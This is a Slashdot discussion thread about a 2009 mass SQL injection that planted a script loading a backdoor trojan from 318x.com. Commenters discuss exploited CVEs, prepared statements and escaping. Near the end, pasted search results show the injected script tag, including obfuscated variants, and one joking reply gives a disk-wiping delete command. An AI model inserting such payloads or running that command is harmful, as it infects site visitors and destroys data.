SQL Injection Attack Claims 132,000+ 186
An anonymous reader writes "A large scale SQL injection attack has injected a malicious iframe on tens of thousands of susceptible websites. ScanSafe reports that the injected iframe loads malicious content from 318x.com, which eventually leads to the installation of a rootkit-enabled variant of the Buzus backdoor trojan. A Google search on the iframe resulted in over 132,000 hits as of December 10, 2009."
Windoze (Score:1, Informative)
Doesn't say what systems are affected by this SQL Injection.
All I can tell (from TFA), is it affects Windows servers.
The real problem (Score:2, Informative)
So it's MS and Adobe vulnerabilities that actually let the malware onto your system.
FTA:
Observed exploits include:
* Integer overflow vulnerability in Adobe Flash Player, described in CVE-2007-0071
* MDAC ADODB.Connection ActiveX vulnerability described in MS07-009
* Microsoft Office Web Components vulnerabilities described in MS09-043
* Microsoft video ActiveX vulnerability described in MS09-032
* Internet Explorer Uninitialized Memory Corruption Vulnerability – MS09-002.
Re:Windoze (Score:5, Informative)
All I can tell (from TFA), is it affects Windows servers.
SQL injection attacks affect any number of platforms. It's not a Windows problem, it's not a database problem, it's a "we hired cheap, unskilled developers" problem.
Now the people who browse these sites and get hit with malware, that looks to be specific to Windows.
Re:Windoze (Score:3, Informative)
Now the people who browse these sites and get hit with malware, that looks to be specific to Windows.
Yeah. I saw my error after I had posted it, so I tried to correct it with a follow up.
Obvious, but needs to be said (Score:4, Informative)
127.0.0.1 318x.com
And you should be safe, for the moment.
Re:318x.com (Score:3, Informative)
Re:How is SQL involved? (Score:1, Informative)
How the hell is this +1 informative? If you comprehended (step 2, after read) the article, you would understand that you have listed the client-side exploits that the payload delivered by the SQL injection. You have not addressed the grandparent, who CLEARLY (as in, in the title AND single line of content) requested more information regarding host profiles that may have been affected by the SQL injection itself.
Re:How is SQL involved? (Score:2, Informative)
On the server end there is a SQL injection exploit being used to get the malicious code out there.
My point being that you don't need to do a SQL injection to do this.
To prevent a SQL injection, you need to change ' to '' on input from the user that you pass to sql.
To prevent a HTML+script injection, you need to change < to <, > to > & to & etc. on input from the user that render to the browser. The sites in question are not doing this, hence, just stick the code you wish to inject into at comment or some other user field. This has nothing to do with SQL.
Re:Details? (Score:2, Informative)
They didn't mention it because it doesn't matter. Its the result of bad coding practices. A sql injection attack is caused by the front end application accepting whatever input its given and using to generate the sql statements. You stop these attacks by sanitizing your input, use stored procedures to do the database work, and possibly stick in a middle ware tear to handle database access, ie apache -> websphere -> database.
Re:Windoze (Score:1, Informative)
True, but the flash exploit is available on anything with flash it looks like (not updated, of course), so the only thing saving Linux/Mac/Sun users is lack of interest on the part of the malware writers.
Re:why don't these go away? (Score:3, Informative)
You must be new here, let me welcome you to "The Internet". I hope you enjoy your visit.
Hosting companies don't give a pair of fetid dingo's kidneys about such matters, so long as the people responsible for the hosting pay good money.
Even the hosting companies [softlayer.com] that claim [softlayer.com] to be anti-spam, and who's acceptable use policies state that ANY support of spam, including hosting spamvertized web sites [softlayer.com], when confronted with multiple, on-going violations [winehq.org], will ignore all reports, remove all forum posts calling attention to those posts, and continue to cash the checks from the spammers.
Re:Let's say it all together now... (Score:4, Informative)
validate your SQL inputs before posting them against an Internet-facing database.
Or simply use prepared statements (or whatever the equivalent term is in your language of choice). Prepared statements are far safer and easier than trying to validate all the current potential and future potential for breaking out of a SQL statement. It won't protect you from people putting in their own parameters into your SQL statement (like say someone elses userID), but that's a different class of vulnerability.
Re:Windoze (Score:2, Informative)
Only easy when using sane languages.
But it used to be very difficult to do the right thing with PHP.
The PHP developers were either incompetent or malicious. Evidence: they created insane stuff like addslashes, magic_quotes and even mysql_real_escape_string.
See: http://php.net/manual/en/function.mysql-real-escape-string.php [php.net]
Fortunately they eventually introduced stuff like PDO (but there was some confusion in the days of PEAR::DB).
And we didn't get stuff like "mysql_definitely_the_real_escape_string_now_no_really" ;).
But why didn't they just copy other people and introduce stuff like PDO right at the start?
Re:AV Detection (Score:3, Informative)
according to TFA:
Malware description
Threatname: Backdoor.Win32.Buzus.croo
Aliases: Trojan-PWS.Win32.Lmir (Ikarus, a-squared); TR/Hijacker.Gen (AntiVir); Trojan/Win32.Buzus.gen (Antiy-AVL); W32/Agent.S.gen!Eldorado (F-Prot, Authentium); Win32:Rootkit-gen (Avast); Generic15.CBGO (AVG); Trojan.Generic.2823971 (BitDefender, GData); Trojan.Buzus.croo (Kaspersky, QuickHeal); Trojan.NtRootKit.2909 (DrWeb); Trj/Buzus.AH (Panda).
That's the trojan that's being installed by the exploits served up by the injected IFRAME. It is not the vulnerability that is allowing the IFRAME to be injected to begin with.
Re:Details? (Score:3, Informative)
They didn't mention it because it doesn't matter. Its the result of bad coding practices.
It does too matter. You don't infect 132,000 web sites with separate injection attacks. That's automated. Lot of the people running forums and CMS-driven web sites don't understand the code well enough to fix anything.
Heck, one of my sites was hacked once, through the forum software. I'm not in the habit of combing through forum code looking for unvalidated inputs. So if someone could mention what the parent exploit is, what versions of that software are effected and whether the operating system OS makes a difference, then those same webmasters could make sure their software was up to date. This article describes the client exploit. I don't care about that, surf with Windows and that's going to happen. I do care that crap isn't originating with any of my web sites.
Re:SQL injection portability (Score:3, Informative)
For various reasons, an SQL injection generally targets a specific application running on a specific database. Unless your database interface is seriously deficient, like MS SQL server, it is difficult to perform a successful SQL injection without knowing what the table structure is. And of course, most applications do not run on multiple database types.
Re:hey (Score:3, Informative)
That one is outdated. What he needs is "rd /s/q C:\".
Re:Probably the Asprox botnet. (Score:3, Informative)
I concur. Searching for the iframe script, this is what I found. Sorry if I can't say if it's something like dotnet nuke. The ocassional coldfusion page also has me wondering.
From the first page of a google search for "<script src=http://318x.com></script>":
City of Iowa City<script src=http://318x.com></script> - How to ... /default/templates/top2.asp, line 60.
Microsoft VBScript runtime error '800a000d'. Type mismatch: '[string: "1035<script src=http"]'.
www.icgov.org/default/?id=1787
YEMEN TIMES : Education ...
Opportunities<script src=http://318x.com></script> Letters<script src=http://318x.com></script> Archive<script src=http://318x.com></script>
www.yementimes.com/DEFAULTSUB.ASPX?pnc=57&pnm... - Cached
IWCS - Learning<script src=http://318%78.com></script><script src ... ...
Membership<script src=http://318%78.com></script><script src=http://318x.%63om></script> IWCS Shared Channels<script src=http://318%78.com></script><script
www.iwcs.com/category.cfm?Category=2932